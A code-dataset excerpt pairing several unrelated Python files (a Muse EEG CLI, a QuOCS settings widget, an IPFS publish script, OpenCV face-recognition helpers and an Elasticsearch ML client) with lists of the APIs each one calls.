dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
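if __name__ == '__main__':
    # Entry-point sketch (assumption): instantiating main() parses sys.argv and
    # dispatches to the sub-command method with the matching name.
    main()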
| [
"argparse.ArgumentParser"
]
| [((98, 1950), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset."""', 'usage': '"""muselsl <command> [<args>]\n Available commands:\n list List available Muse devices.\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n stream Start an LSL stream from Muse headset.\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n view Visualize EEG data from an LSL stream.\n -w --window Window length to display in seconds.\n -s --scale Scale in uV.\n -r --refresh Refresh rate in seconds.\n -f --figure Window size.\n -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).\n\n record Record EEG data from an LSL stream.\n -d --duration Duration of the recording in seconds.\n -f --filename Name of the recording file.\n -dj --dejitter Whether to apply dejitter correction to timestamps.\n\n record_direct Record data directly from Muse headset (no LSL).\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n """'}), '(description=\n \'Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.\'\n , usage=\n """muselsl <command> [<args>]\n Available commands:\n list List available Muse devices.\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n stream Start an LSL stream from Muse headset.\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n view Visualize EEG data from an LSL stream.\n -w --window Window length to display in seconds.\n -s --scale Scale in uV.\n -r --refresh Refresh rate in seconds.\n -f --figure Window size.\n -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).\n\n record Record EEG data from an LSL stream.\n -d --duration Duration of the recording in seconds.\n -f --filename Name of the recording file.\n -dj --dejitter Whether to apply dejitter correction to timestamps.\n\n record_direct Record data directly from Muse headset (no LSL).\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. 
can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n """\n )\n', (121, 1950), False, 'import argparse\n'), ((2491, 2558), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""List available Muse devices."""'}), "(description='List available Muse devices.')\n", (2514, 2558), False, 'import argparse\n'), ((3170, 3247), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Start an LSL stream from Muse headset."""'}), "(description='Start an LSL stream from Muse headset.')\n", (3193, 3247), False, 'import argparse\n'), ((4227, 4297), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Record data from an LSL stream."""'}), "(description='Record data from an LSL stream.')\n", (4250, 4297), False, 'import argparse\n'), ((5071, 5148), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Record directly from Muse without LSL."""'}), "(description='Record directly from Muse without LSL.')\n", (5094, 5148), False, 'import argparse\n'), ((6547, 6619), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""View EEG data from an LSL stream."""'}), "(description='View EEG data from an LSL stream.')\n", (6570, 6619), False, 'import argparse\n')] |
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | [
"quocspyside2interface.gui.freegradients.StoppingCriteriaNM.StoppingCriteriaNM",
"quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary.NelderMeadDictionary"
]
| [((1557, 1610), 'quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary.NelderMeadDictionary', 'NelderMeadDictionary', ([], {'loaded_dictionary': 'nm_dictionary'}), '(loaded_dictionary=nm_dictionary)\n', (1577, 1610), False, 'from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary\n'), ((1673, 1739), 'quocspyside2interface.gui.freegradients.StoppingCriteriaNM.StoppingCriteriaNM', 'StoppingCriteriaNM', ([], {'loaded_dictionary': 'stopping_criteria_dictionary'}), '(loaded_dictionary=stopping_criteria_dictionary)\n', (1691, 1739), False, 'from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM\n')] |
import ipfsapi
c = ipfsapi.connect()
# Use the second key in the node's keychain (index 1), i.e. not the default 'self' key.
peer_id = c.key_list()['Keys'][1]['Id']
# Publish the target CID to IPNS under that key, then read the content back via its /ipns/ name.
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| [
"ipfsapi.connect"
]
| [((21, 38), 'ipfsapi.connect', 'ipfsapi.connect', ([], {}), '()\n', (36, 38), False, 'import ipfsapi\n')] |
import cv2
import os
import numpy as np
# This module contains all the common functions that are called in the tester.py file
# Given an image, the function below returns the rectangles of detected faces along with the grayscale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory, the function below returns the cropped face region of gray_img for each image along with its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
            roi_gray = gray_img[y:y + h, x:x + w]  # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# The function below trains an LBPH face recognizer, taking the faces and faceID lists returned by the previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# The function below draws a bounding box around a detected face in the image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# The function below writes the person's name on the image for the detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
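if __name__ == '__main__':
    # End-to-end usage sketch (the folder and file names are assumptions): train on
    # the labelled sub-directories, then annotate the faces found in one test image.
    faces, faceID = labels_for_training_data('trainingImages')
    face_recognizer = train_classifier(faces, faceID)
    test_img = cv2.imread('TestImages/sample.jpg')
    faces_detected, gray_img = faceDetection(test_img)
    for face in faces_detected:
        (x, y, w, h) = face
        label, confidence = face_recognizer.predict(gray_img[y:y + h, x:x + w])
        draw_rect(test_img, face)
        put_text(test_img, str(label), x, y)
    cv2.imwrite('output.jpg', test_img)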
| [
"cv2.rectangle",
"os.path.join",
"cv2.face.LBPHFaceRecognizer_create",
"cv2.putText",
"numpy.array",
"os.path.basename",
"cv2.cvtColor",
"cv2.CascadeClassifier",
"cv2.imread",
"os.walk"
]
| [((261, 303), 'cv2.cvtColor', 'cv2.cvtColor', (['test_img', 'cv2.COLOR_BGR2GRAY'], {}), '(test_img, cv2.COLOR_BGR2GRAY)\n', (273, 303), False, 'import cv2\n'), ((364, 436), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""HaarCascade/haarcascade_frontalface_default.xml"""'], {}), "('HaarCascade/haarcascade_frontalface_default.xml')\n", (385, 436), False, 'import cv2\n'), ((878, 896), 'os.walk', 'os.walk', (['directory'], {}), '(directory)\n', (885, 896), False, 'import os\n'), ((2203, 2239), 'cv2.face.LBPHFaceRecognizer_create', 'cv2.face.LBPHFaceRecognizer_create', ([], {}), '()\n', (2237, 2239), False, 'import cv2\n'), ((2447, 2520), 'cv2.rectangle', 'cv2.rectangle', (['test_img', '(x, y)', '(x + w, y + h)', '(255, 0, 0)'], {'thickness': '(5)'}), '(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)\n', (2460, 2520), False, 'import cv2\n'), ((2621, 2700), 'cv2.putText', 'cv2.putText', (['test_img', 'text', '(x, y)', 'cv2.FONT_HERSHEY_DUPLEX', '(2)', '(255, 0, 0)', '(4)'], {}), '(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)\n', (2632, 2700), False, 'import cv2\n'), ((2273, 2289), 'numpy.array', 'np.array', (['faceID'], {}), '(faceID)\n', (2281, 2289), True, 'import numpy as np\n'), ((1098, 1120), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1114, 1120), False, 'import os\n'), ((1175, 1203), 'os.path.join', 'os.path.join', (['path', 'filename'], {}), '(path, filename)\n', (1187, 1203), False, 'import os\n'), ((1320, 1340), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (1330, 1340), False, 'import cv2\n')] |
from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in decending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
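if __name__ == '__main__':
    # Usage sketch (assumption): attach the namespaced client to an existing
    # Elasticsearch connection and list the configured anomaly detection jobs.
    from elasticsearch import Elasticsearch
    es = Elasticsearch()  # defaults to localhost:9200
    ml = MlClient(es)
    print(ml.get_jobs())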
| [
"elasticsearch.client.utils.query_params",
"elasticsearch.client.utils._make_path"
]
